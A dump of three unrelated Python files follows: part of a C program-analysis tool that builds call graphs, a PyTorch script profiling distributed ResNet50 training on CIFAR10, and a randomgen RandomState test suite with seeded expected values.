found_name = c.get("name")
if found_name is None:
raise UF.CHCXmlParseError(self.path, 0, (0, 0))
if found_name in self.excludefiles:
continue
id = c.get("id")
if id is None:
print("No id found for " + (found_name or "(name not found)"))
else:
self.filenames[int(id)] = found_name
else:
for c in tgtxnode.findall("c-file"):
found_name = c.get("name")
if found_name is None:
raise UF.CHCXmlParseError(self.path, 0, (0, 0))
if found_name in self.includefiles:
id = c.get("id")
if id is None:
print("No id found for " + found_name)
else:
self.filenames[int(id)] = found_name
else:
self._initialize_file(0, fname)
def _initialize_files(self) -> None:
for i, f in self.filenames.items():
self._initialize_file(i, f)
def _initialize_file(self, index: int, fname: str) -> None:
if fname in self.files:
return
cfile = UF.get_cfile_xnode(self.path, fname)
if cfile is not None:
self.filenames[index] = fname
self.files[fname] = CFile(self, index, cfile)
self.indexmanager.add_file(self.files[fname])
else:
tgtxnode = UF.get_targetfiles_xnode(self.path)
if tgtxnode is None:
raise UF.CHCXmlParseError(self.path, 0, (0, 0))
filenames = [c.get("name") or "name not found" for c in tgtxnode.findall("c-file")]
raise UF.CFileNotFoundException(filenames)
def _initialize_callgraphs(self) -> None:
if len(self.callgraph) > 0:
return
def collectcallers(fn: "CFunction") -> None:
fid = fn.cfile.index
vid = fn.svar.get_vid()
def g(cs):
if cs.callee is None:
return
fundef = self.indexmanager.resolve_vid(fid, cs.callee.get_vid())
if fundef is not None:
if not (fid, vid) in self.callgraph:
self.callgraph[(fid, vid)] = []
self.callgraph[(fid, vid)].append((cs, fundef))
fn.iter_callsites(g)
self.iter_functions(collectcallers)
for s in self.callgraph:
for (cs, t) in self.callgraph[s]:
if t not in self.revcallgraph:
self.revcallgraph[t] = []
self.revcallgraph[t].append((s, cs))
|
resnet50_ddp_profiler.py | import os
import torch
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim
import torch.profiler
import torch.utils.data
import torchvision
import torchvision.models as models
import torchvision.transforms as T
from torch.nn.parallel import DistributedDataParallel as DDP
def example(rank, use_gpu=True):
if use_gpu:
torch.cuda.set_device(rank)
model = models.resnet50(pretrained=True).to(rank)
model.cuda()
cudnn.benchmark = True
model = DDP(model, device_ids=[rank])
else:
model = models.resnet50(pretrained=True)
model = DDP(model)
# Use gradient compression to reduce communication
# model.register_comm_hook(None, default.fp16_compress_hook)
# or
# state = powerSGD_hook.PowerSGDState(process_group=None,matrix_approximation_rank=1,start_powerSGD_iter=2)
# model.register_comm_hook(state, powerSGD_hook.powerSGD_hook)
transform = T.Compose([T.Resize(256), T.CenterCrop(224), T.ToTensor()])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform)
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=32, sampler=train_sampler,
shuffle=False, num_workers=4)
if use_gpu:
criterion = nn.CrossEntropyLoss().to(rank)
else:
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)
model.train()
with torch.profiler.profile(
activities=[
torch.profiler.ProfilerActivity.CPU,
torch.profiler.ProfilerActivity.CUDA],
schedule=torch.profiler.schedule(
wait=2,
warmup=2,
active=5),
with_stack=False,
on_trace_ready=torch.profiler.tensorboard_trace_handler('./result'),
record_shapes=True
) as p:
for step, data in enumerate(trainloader, 0):
print("step:{}".format(step))
if use_gpu:
inputs, labels = data[0].to(rank), data[1].to(rank)
else:
inputs, labels = data[0], data[1]
outputs = model(inputs)
loss = criterion(outputs, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
p.step()
if step + 1 >= 10:
break
def init_process(rank, size, fn, backend='nccl'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 4
processes = []
mp.set_start_method("spawn")
for rank in range(size):
p = mp.Process(target=init_process, args=(rank, size, example))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_randomstate.py | import hashlib
import pickle
import sys
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_array_almost_equal,
assert_array_equal,
assert_equal,
assert_no_warnings,
assert_raises,
assert_warns,
suppress_warnings,
)
import pytest
from randomgen.mt19937 import MT19937
import randomgen.mtrand
from randomgen.xoshiro256 import Xoshiro256
random = randomgen.mtrand
INT_FUNCS = {
"binomial": (100.0, 0.6),
"geometric": (0.5,),
"hypergeometric": (20, 20, 10),
"logseries": (0.5,),
"multinomial": (20, np.ones(6) / 6.0),
"negative_binomial": (100, 0.5),
"poisson": (10.0,),
"zipf": (2,),
}
if np.iinfo(int).max < 2 ** 32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {
"binomial": "670e1c04223ffdbab27e08fbbad7bdba",
"logseries": "6bd0183d2f8030c61b0d6e11aaa60caf",
"geometric": "6e9df886f3e1e15a643168568d5280c0",
"hypergeometric": "7964aa611b046aecd33063b90f4dec06",
"multinomial": "68a0b049c16411ed0aa4aff3572431e4",
"negative_binomial": "dc265219eec62b4338d39f849cd36d09",
"poisson": "7b4dce8e43552fc82701c2fa8e94dc6e",
"zipf": "fcd2a2095f34578723ac45e43aca48c5",
}
else:
INT_FUNC_HASHES = {
"binomial": "b5f8dcd74f172836536deb3547257b14",
"geometric": "8814571f45c87c59699d62ccd3d6c350",
"hypergeometric": "bc64ae5976eac452115a16dad2dcf642",
"logseries": "84be924b37485a27c4a98797bc88a7a4",
"multinomial": "ec3c7f9cf9664044bb0c6fb106934200",
"negative_binomial": "210533b2234943591364d0117a552969",
"poisson": "0536a8850c79da0c78defd742dccc3e0",
"zipf": "f2841f504dd2525cd67cdcad7561e532",
}
@pytest.fixture(scope="module", params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param], INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a["bit_generator"], b["bit_generator"])
assert_array_equal(a["state"]["key"], b["state"]["key"])
assert_array_equal(a["state"]["pos"], b["state"]["pos"])
assert_equal(a["has_gauss"], b["has_gauss"])
assert_equal(a["gauss"], b["gauss"])
class TestSeed(object):
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([], dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3], [4, 5, 6]])
def test_seed_equivalency(self):
rs = random.RandomState(0)
rs2 = random.RandomState(MT19937(0, mode="legacy"))
assert_mt19937_state_equal(
rs.get_state(legacy=False), rs2.get_state(legacy=False)
)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype="int")
for p in [0, 0.5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p, float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-0.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_noncontiguous(self):
p = np.arange(15.0)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_large_p(self):
with pytest.raises(ValueError, match=r"sum\(pvals"):
random.multinomial(100, np.array([0.7, 0.6, 0.5, 0]))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(Xoshiro256(mode="legacy"))
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state["bit_generator"] == "Xoshiro256"
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ("Unknown",) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(
TypeError, self.random_state.set_state, np.array(new_state, dtype=object)
)
state = self.random_state.get_state(legacy=False)
del state["bit_generator"]
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled["has_gauss"], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith("RandomState(MT19937)")
class TestRandint(object):
rfunc = random.randint
# valid integer/boolean types
itype = [
np.bool_,
np.int8,
np.uint8,
np.int16,
np.uint16,
np.int32,
np.uint32,
np.int64,
np.uint64,
]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError(
"No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e)
)
def test_in_bounds_fuzz(self):
# Don"t use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2 ** 16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2 ** 16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {
"bool": "7dd3170d7aa461d201a65f8bcf3944b0",
"int16": "1b7741b80964bb190c50d541dca1cac1",
"int32": "4dc9fcc2b395577ebb51793e58ed1a05",
"int64": "17db902806f448331b5a758d7d2ee672",
"int8": "27dd30c4e08a797063dffac2490b0be6",
"uint16": "1b7741b80964bb190c50d541dca1cac1",
"uint32": "4dc9fcc2b395577ebb51793e58ed1a05",
"uint64": "17db902806f448331b5a758d7d2ee672",
"uint8": "27dd30c4e08a797063dffac2490b0be6",
}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == "little":
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, "dtype"))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array(
[
[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array(
[
[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889],
],
dtype=np.int64,
)
else:
desired = np.array(
[
[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332],
],
dtype=np.int64,
)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo("l").max, np.iinfo("l").max)
assert_(len(w) == 1)
desired = np.iinfo("l").max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype("l").type
actual = random.random_integers(
typer(np.iinfo("l").max), typer(np.iinfo("l").max)
)
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning, random.random_integers, np.iinfo("l").max)
# DeprecationWarning raised with high != None
assert_raises(
DeprecationWarning,
random.random_integers,
np.iinfo("l").max,
np.iinfo("l").max,
)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(["a", "b", "c", "d"], 4)
desired = np.array(["c", "d", "c", "d"])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3.0, 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(
ValueError, sample, [1, 2, 3, 4], 3, p=[[0.25, 0.25], [0.25, 0.25]]
)
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(["a", "b"], size=(3, 0, 4)).shape, (3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_nontintiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
choice1 = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
choice2 = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(choice1, choice2)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b"\x82Ui\x9e\xff\x97+Wf\xa5"
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [
lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (
np.asarray([(i, i) for i in x], [("a", int), ("b", int)]).view(
np.recarray
)
),
# gh-4270
lambda x: np.asarray(
[(i, i) for i in x], [("a", (object, (1,))), ("b", (np.int32, (1,)))]
),
]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for _ in range(50):
random.shuffle(a)
assert_equal(sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(0.1, 0.9, size=(3, 2))
desired = np.array(
[
[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, 0.456, size=(3, 2))
desired = np.array([[37, 43], [42, 48], [46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, 0.456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array(
[
[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array(
[
[
[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598],
],
[
[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688],
],
[
[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_non_contiguous_alpha(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha), size=(3, 2))
assert_array_almost_equal(contig, non_contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array(
[
[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.0)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array(
[
[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array(
[
[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
